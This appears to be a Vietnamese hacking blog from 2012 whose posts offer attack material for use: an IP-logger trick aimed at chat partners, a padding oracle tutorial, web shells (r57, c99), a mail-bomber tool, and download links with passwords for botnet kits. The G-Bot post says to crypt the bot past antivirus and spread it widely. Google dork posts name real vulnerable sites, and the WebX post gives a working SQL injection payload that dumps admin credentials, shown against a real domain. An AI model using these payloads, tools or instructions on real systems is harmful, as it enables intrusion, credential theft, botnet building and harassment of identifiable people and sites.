Thứ Ba, 3 tháng 7, 2012

Xem Ip Bạn Chát



          Download 2 file ip.php và ip_log.txt về và up lên host  ( Có thể dung host free)
          Chmod file ip_log.txt về 777
          Rồi gửi link file ip.php cho bạn chat. Ví dụ: http://www.vhbgroup.net/ip.php ( Có thẻ rename file ip.php )
           Sau đó ip bạn chat sẽ gửi về file ip_log.txt. View file đó và xem ip: http://www.vhbgroup.net/ip_log.txt


 

Các link trên chỉ mang tính chất demo

pass unlock: soleil_vhb
pass download: ceh.vn

Thứ Sáu, 29 tháng 6, 2012

[Tut] Padding Orale Attack





 
Kiểm tra lỗi Padding Orale



View source:



Chú ý đoạn code sau:
/WebResource.axd?d=OpduU2rj_NJHaBhjNiUZ7g2&t=634538991637902500" 


Bước 1: Chuẩn bị Tools

Trước tiên cần cài đặt perl:

Coppy 2 file  padBuster.pl và Web.config_bruter.pl sau vào ổ C:

padBuster.pl:
Web.config_bruter.pl:
pass unlock: soleil_vhb
pass giải nén: ceh.vn



Thứ Tư, 27 tháng 6, 2012

[Bài 2 - Local Attack] Giới Thiệu Tính Năng 1 Sô Shell


Nói đến local là nói đến shell, không có shell thì chỉ local bằng niềm tin. Hôm nay soleil giới thiệu một số loại shell thông dụng không thể thiếu trong local attack

Một số shell thông dụng:

 r57.php

R57 hiện nay đang là shell thông dụng, được sử dụng phổ biến nhất với hầu như là đầy đủ các tính năng.


c99.php


Nói đến r57 cũng không thể  không nhắc đến c99 với các thao tác có sẵn trên shell mà không cần phải sử dụng lệnh: edit, del, insert, drop… đặc biệt là có khả năng dump cơ sở dữ liệu

Thứ Sáu, 22 tháng 6, 2012

Tool Bom Mail MaxBomber





Tool Bom Mail Good MaxBomber:



Hình ảnh demo victim bị tấn công:


   
-           

   

Chủ Nhật, 17 tháng 6, 2012

[Ddos-BotNet] seo4loader



Đây là code botnet mạnh nhât hiện nay.



Link download:  http://www.mediafire.com/?x7fdp13fhtad1d6

pass download: ceh.vn
pass giải nén: soleil_vhb

[Google Dork] SQl - Public 16/6


Google Dork : inurl:Default.aspx?PageID= 

Dang khai thác đối với aspx ở dork này tương tự như trong tut sau:

Sau đây là 1 số site dính lỗi này:

www.sagiang.com.vn/Default.aspx?pageid=57'               



Chủ Nhật, 10 tháng 6, 2012

[Bonet] G-bot 2.2

Code + Data + File Buider  G-Bot version 2.2.  Code này được viết bới các hacker người nga.




Cách sử dụng:

-  Upcode + Database lên host sau đó chỉnh sửa các thông số trong file config ( bao gồm cả pass để dăng nhập nữa)



-  Click vào file buider.exe để tạo bot.

Host: tên domain

Path : Đường dẫn tới code botnet:



- Bước còn lại là bạn file mã hóa con bot này khỏi tât cả antivirus và phát tán nó càng nhiều càng tốt để tạo 1 mạng lưới bot lớn.


Link download: 

G-Bot 2.2 : http://www.mediafire.com/download.php?o9mg3berija7jpj
G-bot 1.7 :  http://www.mediafire.com/download.php?3qbxeyuvqhoxidi


Pass dải nén: vhb

Chủ Nhật, 3 tháng 6, 2012

[Tut] Tổng Hợp Các Dạng Tut Hack Web Cơ Bản




Như tiêu đề, Soleil tổng hợp các dạng tut Hack Web của ae hacker đi trước đã để lại để cho các bạn mới bước vào con đường hacking dễ tra cứu và học tập. Chủ yếu là các vấn đề xoay quanh local attack & Upshell   -  2 Kỹ năng quan trọng trong không thể thiếu trong website hacking!

 Phần I:



pass: soleil_vhb 

Phần II: 


pass: soleil_vhb 




1. Local Attack

 1.26MB – Tác Giả: Unlock_virus
Video Hướng dẫn sử dụng Shell và local ( rất căn bản cho newbie)

2. Local- Mastercarder.org 

7.35MB – Tác Giả: Chưa Rõ
Video Local Mastercarder.org và giải mã file config bị mã hóa (BYpass qua MySQL

3. Local attack,Upload shell 

1.86MB – Tác Giả: d0nd0c(Vniss)
Video local cardheaven.net rất căn bản , dành cho newbie

Thứ Năm, 31 tháng 5, 2012

[Bug] WebX (showsubpage.asp) SQLI

1. Google dork:   

inurl:"showsubpage.asp" "Powered By: WebX" 


2. Khai thác


-  Thêm Query 

null+and+1=2+union+select+1,2,3,4,5,pass,login,8,9,10,11,12,13,14,15,16,17+from+admin+where+id=1
 
  vào sau  http://www.victim.com/showsubpage.asp?subid=
 

- Nếu site dính bug này, nó sẽ hiện thi thông tin username và password được mã hóa MD5 của admin

Ví dụ: 

http://www.erdf.edu.in/showsubpage.asp?subid=null+and+1=2+union+select+1,2,3,4,5,pass,login,8,9,10,11,12,13,14,15,16,17+from+admin+where+id=1
 

 
-  Để giải mã pass bị mã hóa md5 đó, bạn có thể vứt đoạn mã đó lên google